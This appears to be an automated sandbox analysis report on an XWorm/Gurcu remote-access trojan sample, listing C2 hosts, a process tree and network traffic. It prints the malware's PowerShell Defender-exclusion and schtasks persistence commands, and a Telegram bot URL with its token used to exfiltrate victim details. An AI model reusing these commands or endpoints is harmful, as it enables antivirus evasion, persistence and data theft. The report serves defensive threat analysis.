Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/07/2024, 20:33 UTC

General

  • Target

    rootkit2.exe

  • Size

    92KB

  • MD5

    5651e7a81c8fb1fd46815980400e2a5e

  • SHA1

    6ac8c6c10930701bca9acc90d1c05acb679ea0fb

  • SHA256

    8cfbd820492a10d05d35bdc16b2a14c1e2cfeea59a7ac580d4ab31e2d9c2f02b

  • SHA512

    68f2d92610ff1ec6f9c729aac55eacd9b6770772ebdca53f911165713ea895cf3b27119f799cf48c0ab8978fef6c6d9dcd57bb149e24f660c1af1d985faacd3b

  • SSDEEP

    1536:1tyN2QvLnSw2tKKKuax1F8ujwxmHTMHreiQM5CC/Oij5UEd/7Fn:10N2ELnSVK5xf5oHrxQICCmij5UEj

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403

127.0.0.1:7016

software-orchestra.gl.at.ply.gg:7016

Mutex

NRP6rH1yxlCpJJhG

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain
1
nocm6J1y+qmDUAQ6rbiLPw==
aes.plain
1
5+XxHXtOaGwHigHemBMYiw==

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6627858737:AAHxdKC8nYjdelv_iw7J0fHrFBgCVb61I0U/sendMessage?chat_id=5189170483

Signatures

  • Detect Xworm Payload 4 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\rootkit2.exe
    "C:\Users\Admin\AppData\Local\Temp\rootkit2.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Users\Admin\AppData\Roaming\svhost.exe
      "C:\Users\Admin\AppData\Roaming\svhost.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3564
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4852
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "XClient"
        3⤵
          PID:3944
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBDC8.tmp.bat""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\system32\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:1996
      • C:\Users\Admin\AppData\Roaming\XClient.exe
        "C:\Users\Admin\AppData\Roaming\XClient.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:540
    • C:\Users\Admin\AppData\Roaming\XClient.exe
      C:\Users\Admin\AppData\Roaming\XClient.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3780
    • C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UseRestart.m4a"
      1⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:428
    • C:\Program Files\VideoLAN\VLC\vlc.exe
      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UseRestart.m4a"
      1⤵
        PID:752
      • C:\Users\Admin\AppData\Roaming\XClient.exe
        C:\Users\Admin\AppData\Roaming\XClient.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2376

      Network

      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.dual-a-0034.a-msedge.net
        g-bing-com.dual-a-0034.a-msedge.net
        IN CNAME
        dual-a-0034.a-msedge.net
        dual-a-0034.a-msedge.net
        IN A
        204.79.197.237
        dual-a-0034.a-msedge.net
        IN A
        13.107.21.237
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=259894648E46610438D580DD8F61604A; domain=.bing.com; expires=Tue, 05-Aug-2025 20:33:10 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 8EB956B43E604F3EAB55AFB85AA12BE9 Ref B: LON04EDGE0716 Ref C: 2024-07-11T20:33:10Z
        date: Thu, 11 Jul 2024 20:33:09 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=259894648E46610438D580DD8F61604A
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=P74JY1Iln7t91axOBsqnHypUeJq9ERKDq41qjxy798E; domain=.bing.com; expires=Tue, 05-Aug-2025 20:33:10 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 563030A71E6140BCA011E301CDE784F3 Ref B: LON04EDGE0716 Ref C: 2024-07-11T20:33:10Z
        date: Thu, 11 Jul 2024 20:33:09 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=259894648E46610438D580DD8F61604A; MSPTC=P74JY1Iln7t91axOBsqnHypUeJq9ERKDq41qjxy798E
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 3B3D425E77824DE784B9114B141C310F Ref B: LON04EDGE0716 Ref C: 2024-07-11T20:33:10Z
        date: Thu, 11 Jul 2024 20:33:09 GMT
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        23.58.20.217.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.58.20.217.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        4.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        4.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        237.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        237.197.79.204.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        26.35.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.35.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        ip-api.com
        XClient.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        svhost.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Thu, 11 Jul 2024 20:33:12 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 59
        X-Rl: 43
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        XClient.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Thu, 11 Jul 2024 20:33:12 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 59
        X-Rl: 42
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        api.telegram.org
        XClient.exe
        Remote address:
        8.8.8.8:53
        Request
        api.telegram.org
        IN A
        Response
        api.telegram.org
        IN A
        149.154.167.220
      • flag-nl
        GET
        https://api.telegram.org/bot6627858737:AAHxdKC8nYjdelv_iw7J0fHrFBgCVb61I0U/sendMessage?chat_id=5189170483&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A5C6E90B571CDB1116820%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2
        XClient.exe
        Remote address:
        149.154.167.220:443
        Request
        GET /bot6627858737:AAHxdKC8nYjdelv_iw7J0fHrFBgCVb61I0U/sendMessage?chat_id=5189170483&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A5C6E90B571CDB1116820%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
        Host: api.telegram.org
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Thu, 11 Jul 2024 20:33:15 GMT
        Content-Type: application/json
        Content-Length: 602
        Connection: keep-alive
        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Methods: GET, POST, OPTIONS
        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
      • flag-us
        DNS
        220.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        220.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        quotes-suites.gl.at.ply.gg
        svhost.exe
        Remote address:
        8.8.8.8:53
        Request
        quotes-suites.gl.at.ply.gg
        IN A
        Response
        quotes-suites.gl.at.ply.gg
        IN A
        147.185.221.20
      • flag-us
        DNS
        20.221.185.147.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        20.221.185.147.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        software-orchestra.gl.at.ply.gg
        XClient.exe
        Remote address:
        8.8.8.8:53
        Request
        software-orchestra.gl.at.ply.gg
        IN A
        Response
        software-orchestra.gl.at.ply.gg
        IN A
        147.185.221.21
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        101.58.20.217.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        101.58.20.217.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        25.140.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        25.140.123.92.in-addr.arpa
        IN PTR
        Response
        25.140.123.92.in-addr.arpa
        IN PTR
        a92-123-140-25deploystaticakamaitechnologiescom
      • flag-us
        DNS
        203.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        203.197.79.204.in-addr.arpa
        IN PTR
        Response
        203.197.79.204.in-addr.arpa
        IN PTR
        a-0003a-msedgenet
      • flag-us
        DNS
        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        31.243.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        31.243.111.52.in-addr.arpa
        IN PTR
        Response
      • 204.79.197.237:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=
        tls, http2
        2.0kB
        9.3kB
        22
        19

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a80291d2e8804f358aa9ea67c0a85f44&localId=w:7F54B7CC-A139-0C44-079B-F8E35781E681&deviceId=6825836757805329&anid=

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        svhost.exe
        310 B
        347 B
        5
        4

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        XClient.exe
        310 B
        347 B
        5
        4

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 149.154.167.220:443
        https://api.telegram.org/bot6627858737:AAHxdKC8nYjdelv_iw7J0fHrFBgCVb61I0U/sendMessage?chat_id=5189170483&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A5C6E90B571CDB1116820%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2
        tls, http
        XClient.exe
        1.3kB
        7.3kB
        11
        12

        HTTP Request

        GET https://api.telegram.org/bot6627858737:AAHxdKC8nYjdelv_iw7J0fHrFBgCVb61I0U/sendMessage?chat_id=5189170483&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A5C6E90B571CDB1116820%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

        HTTP Response

        200
      • 147.185.221.20:49403
        quotes-suites.gl.at.ply.gg
        svhost.exe
        3.4kB
        14.9kB
        44
        49
      • 127.0.0.1:7016
        XClient.exe
      • 127.0.0.1:7016
        XClient.exe
      • 147.185.221.21:7016
        software-orchestra.gl.at.ply.gg
        XClient.exe
        260 B
        5
      • 147.185.221.20:49403
        quotes-suites.gl.at.ply.gg
        svhost.exe
        13.8MB
        224.2kB
        10098
        5214
      • 147.185.221.21:7016
        software-orchestra.gl.at.ply.gg
        XClient.exe
        260 B
        5
      • 147.185.221.21:7016
        software-orchestra.gl.at.ply.gg
        XClient.exe
        260 B
        5
      • 147.185.221.21:7016
        software-orchestra.gl.at.ply.gg
        XClient.exe
        260 B
        5
      • 147.185.221.20:49403
        quotes-suites.gl.at.ply.gg
        svhost.exe
        164.5kB
        3.6kB
        127
        70
      • 147.185.221.21:7016
        software-orchestra.gl.at.ply.gg
        XClient.exe
        208 B
        4
      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        151 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.237
        13.107.21.237

      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        23.58.20.217.in-addr.arpa
        dns
        71 B
        131 B
        1
        1

        DNS Request

        23.58.20.217.in-addr.arpa

      • 8.8.8.8:53
        4.159.190.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        4.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        237.197.79.204.in-addr.arpa
        dns
        73 B
        143 B
        1
        1

        DNS Request

        237.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        26.35.223.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        26.35.223.20.in-addr.arpa

      • 8.8.8.8:53
        ip-api.com
        dns
        XClient.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        api.telegram.org
        dns
        XClient.exe
        62 B
        78 B
        1
        1

        DNS Request

        api.telegram.org

        DNS Response

        149.154.167.220

      • 8.8.8.8:53
        220.167.154.149.in-addr.arpa
        dns
        74 B
        167 B
        1
        1

        DNS Request

        220.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        quotes-suites.gl.at.ply.gg
        dns
        svhost.exe
        72 B
        88 B
        1
        1

        DNS Request

        quotes-suites.gl.at.ply.gg

        DNS Response

        147.185.221.20

      • 8.8.8.8:53
        20.221.185.147.in-addr.arpa
        dns
        73 B
        130 B
        1
        1

        DNS Request

        20.221.185.147.in-addr.arpa

      • 8.8.8.8:53
        software-orchestra.gl.at.ply.gg
        dns
        XClient.exe
        77 B
        93 B
        1
        1

        DNS Request

        software-orchestra.gl.at.ply.gg

        DNS Response

        147.185.221.21

      • 8.8.8.8:53
        183.59.114.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        183.59.114.20.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        101.58.20.217.in-addr.arpa
        dns
        72 B
        132 B
        1
        1

        DNS Request

        101.58.20.217.in-addr.arpa

      • 8.8.8.8:53
        25.140.123.92.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        25.140.123.92.in-addr.arpa

      • 8.8.8.8:53
        203.197.79.204.in-addr.arpa
        dns
        73 B
        106 B
        1
        1

        DNS Request

        203.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      • 8.8.8.8:53
        31.243.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        31.243.111.52.in-addr.arpa

      • 8.8.8.8:53

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        04f1d68afbed6b13399edfae1e9b1472

        SHA1

        8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

        SHA256

        f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

        SHA512

        30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        4920f7bec7cdb8ac44637a6af9d2fc6f

        SHA1

        d4c5e3c9397926ec9bdaccdd955e89f5138b1816

        SHA256

        8cc607eab702c5690ee5d64f5d34add46b7093c23751506dad728853a434a277

        SHA512

        321e8178ebd08d680c6d1af467ab73e3055af8c8bb06ee81b1af46bd6718e5a060c339da5a281028c2557ab8d85172921e10363ccd8d411aa0e75f62119838d7

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zn1myc1a.wq3.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tmpBDC8.tmp.bat

        Filesize

        155B

        MD5

